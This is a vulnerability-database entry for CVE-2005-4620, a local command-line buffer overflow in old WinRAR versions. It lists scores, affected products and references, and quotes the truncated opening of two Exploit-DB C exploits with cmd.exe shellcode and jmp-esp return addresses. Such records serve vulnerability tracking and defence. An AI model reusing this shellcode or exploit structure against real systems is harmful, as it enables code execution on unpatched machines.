CVE-2005-4620
Published 2005-12-31
Priority: P4 · CVSS 2.0 base score: 4.6 (medium)
CVSS 2.0 vector: AV:L/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit code available (see Exploit-DB entries below)
EPSS: 1.48% (70.8th percentile)
Buffer overflow in WinRAR 3.50 and earlier allows local users to execute arbitrary code via a long command-line argument. NOTE: because this program executes with the privileges of the invoking user, and because remote programs do not normally have the ability to specify a command-line argument for this program, there may not be a typical attack vector for the issue that crosses privilege boundaries. Therefore this may not be a vulnerability.
Affected
12 ranges (version boundaries not captured on the page; all entries are identical)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rarlab | winrar | — | — |
No detection rules found.
Exploit-DB
WinRAR 3.30 - 'Filename' Local Buffer Overflow (1) (exploitdb, 2006-01-04, CVE-2005-4620)
---
```c
/* WinRAR Buffer Overflow 3.30 Exploit
*
* Bug found by: Vredited By Alpha Programmer & Trap-Set U.H Team
* Exploit made by: K4P0
* Contact: [email protected]
*/
#include
#include
int main(void)
{
char EvilBuff[1024];
// Normal cmd.exe shellcode.
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
"\xF8\x50\xBB\x44\x80\xBF\x77\xFF\xD3";
char jmpesp_offset[] = "\x0F\x98\xF8\x77";
char Prog[1024] = "WinRAR ";
printf("WinRAR Buffer Overflow 3.30 Exploit\n\n");
printf("Bug discovered by: Vredited By Alpha Programmer & Trap-Set U.H Team\n");
printf("Exploit made by: K4P0\n");
memset(EvilBuff, 0x00,
```
Exploit-DB
WinRAR 3.30 - 'Filename' Local Buffer Overflow (2) (exploitdb, 2006-01-04, CVE-2005-4620)
---
```c
/*
IHS public source code
WinRAR 3.3.0 and below local BOF exploit
author : c0d3r , kaveh razavi
advisory : http://www.securityfocus.com/archive/1/420679
tnx to alpha who reported the vulnerability
workaround: use the latest version
special tnx to LorD and NT of IHS (my workmates and best friends)
www.ihsteam.com
www.ihsteam.net
www.c0d3r.org
showing some of iranian kids what real hacking is .
specially those who think changing a name server is hacking =)
*/
#include
#include
#include
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 930
char exploit[size];
char winxpsp1[] = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
char winxpsp2[] = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
char win2ksp4[] = "\xBB\xED\x4F\x7C"; //
```
No writeups or analysis indexed.
References
- http://www.rarlab.com/rarnew.htm
- http://www.securityfocus.com/archive/1/420679/100/0/threaded
- http://www.securityfocus.com/bid/15123
- http://www.securityfocus.com/data/vulnerabilities/exploits/0xletzdance.c